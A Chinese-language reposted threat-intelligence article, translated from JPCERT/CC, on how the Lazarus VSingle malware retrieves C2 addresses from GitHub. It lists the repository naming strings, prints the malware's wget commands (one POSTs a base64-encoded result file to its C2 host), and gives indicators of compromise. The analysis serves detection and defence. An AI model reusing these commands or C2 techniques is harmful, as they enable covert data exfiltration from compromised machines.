从 GitHub 获取 C2 服务器信息的 VSingle 恶意软件

admin 2022年7月12日21:10:44安全文章评论10 views2894字阅读9分38秒阅读模式

关键词

C2服务器、VSingle、恶意软件

1. VSingle概述


某些种类的恶意软件使用 DGA、混淆目标信息或包含虚假 C2 服务器信息的方法来隐藏原始 C2 服务器。最近,Lazarus VSingle使用的恶意软件已完成更新,它可以从 GitHub 检索 C2 服务器信息。

VSingle拥有三个硬编码的C2服务器,当它无法从其中获取数据时,恶意软件会访问Github来获取新的C2服务器。具体操作流程如图1。

从 GitHub 获取 C2 服务器信息的 VSingle 恶意软件

图1:VSingle操作流程

第一次通信用于发送如下数据。

https://mantis.westlinks.net/api/soap/mc_enum.php?uid=[ランダムな数字列]&upw=[Base64文字列]

其中,参数uid包含主机名、内核版本号和八进制IP地址组合的哈希值;参数upw包含了“[IP 地址]|30.0|12b”的 Base64 编码字符串。

C2服务器对上述请求的响应会被存储在以下目录中。

/tmp/.sess_%08x

该响应<contents>部分的数据为AES密钥、IV数据和Base64+RC4后的命令。

2. GitHub访问模式


通信访问的GitHub仓库地址并非固定而是动态生成的。以下是访问的URL的样式。

https://raw.githubusercontent.com/%s/%s/master/README.de

可从以下列表中随机选取字符串+随机的字符串组成用户名和仓库名。

表 1: 用户名及仓库字符串使用列表
用户名 仓库名
gar3ia Arcan3
wo0d Wr0te
tr3e after
lucky luxuryboy
l0ve pnpgather
v0siej happyv1m
e0vvsje laz3rpik
polaris d0ta
grav1ty Dronek
w1inter Panda3
summer cpsponso

ggo0dlluck

攻击者使用的GitHub仓库会在<videolink1>标签中引入一个URL,如图2所示。恶意代码会从仓库中获取此URL并建立连接。附录A列举了JPCERT/CC 确认了的攻击者使用的 GitHub 存储库。

从 GitHub 获取 C2 服务器信息的 VSingle 恶意软件

图2:攻击者使用GitHub仓库的实例

3. 通信方式


当前版本的VSingle使用wget命令和C2服务器建立连接,而以往的版本则使用系统调用。图3显示了用于执行wget命令的部分代码。(Windows 操作系统上的 Vsingle 不包含此更新,并且使用 Windows API,而不是 wget 命令。)

从 GitHub 获取 C2 服务器信息的 VSingle 恶意软件

图3:执行命令wget的部分代码

虽然大多数的恶意软件使用系统调用和 API 与 C2 服务器通信,但 VSingle 执行 wget 命令的方式显得格外大胆,因为该方式较容易留下痕迹。此外,通信结果始终保存在文件中。在实际通信过程中,会执行以下命令。

sh -c "wget -t 1 --server-response --no-check-certificate --user-agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.24 Safari/537.36" "https://mantis.westlinks.net/api/soap/mc_enum.php?uid=15022694&upw=MTkyLjE2OC4yLjI0fDMwLjB8MTJi" -O /tmp/.sess_7b00cf8e 2>&1 | awk '/^ HTTP/{print $2}'"

于命令执行结果,保存执行结果的文件(/tmp/.sess_%04x)将使用Base64进行编码,并通过HTTP POST通信发送,如下所示。

sh -c "wget -t 1 --server-response --no-check-certificate --post-data="uid=15022694&fipng=`base64 /tmp/.sess_%04x`" --user-agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.24 Safari/537.36" "https://mantis.westlinks.net/api/soap/mc_enum.php?uid=15022694&jsid=[AES Key, IV]" -O /tmp/.sess_7b00cf8e 2>&1 | awk '/^ HTTP/{print $2}'"字列]


4. 总结


攻击者通常篡改合法的web服务器或使用合法的云服务来隐藏与C2服务器的通信。考虑到很难从日志中检测到这类恶意软件,作者建议采取类似限制用途有限的服务器的可访问地址的方法作为对策。

5. 攻击指标


指标1:攻击者使用的邮箱列表(具体邮箱列表请点击阅读原文)
https://github.com/bgrav1ty13j/bPanda3

https://github.com/fwo0d17n/fWr0te

https://github.com/glucky18p/gluxuryboy

https://github.com/gf00t18p/gpick/

https://github.com/jv0siej21g/jlaz3rpi

指标2:攻击者使用的C2服务器

https://[man]tis.westlinks.net/api/soap/mc_enum.php

https://[www].shipshorejob.com/ckeditor/samples/samples.php

http://[crm].vncgroup.com/cats/scripts/sphinxview.php

https://[ou]green.com/zone

https://[tec]nojournals.com/general

https://[semi]conductboard.com/xcror

https://[blue]dragon.com/login

https://[tec]nojournals.com/pres

指标3:恶意代码哈希值

199ba618efc6af9280c5abd86c09cdf2d475c09c8c7ffc393a35c3d70277aed1

2eb16dbc1097a590f07787ab285a013f5fe235287cb4fb948d4f9cce9efa5dbc

414ed95d14964477bebf86dced0306714c497cde14dede67b0c1425ce451d3d




END

参考链接:https://blogs.jpcert.or.jp/en/2022/07/vsingle.html


编辑|王咏珊

审校|何双泽、金矢

本文为CNTIC编译整理,不代表本公众号观点,转载请保留出处与链接。联系信息进入公众号后点击“关于我们”可见。

从 GitHub 获取 C2 服务器信息的 VSingle 恶意软件


原文始发于微信公众号(国家网络威胁情报共享开放平台):从 GitHub 获取 C2 服务器信息的 VSingle 恶意软件

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月12日21:10:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  从 GitHub 获取 C2 服务器信息的 VSingle 恶意软件 http://cn-sec.com/archives/1173362.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: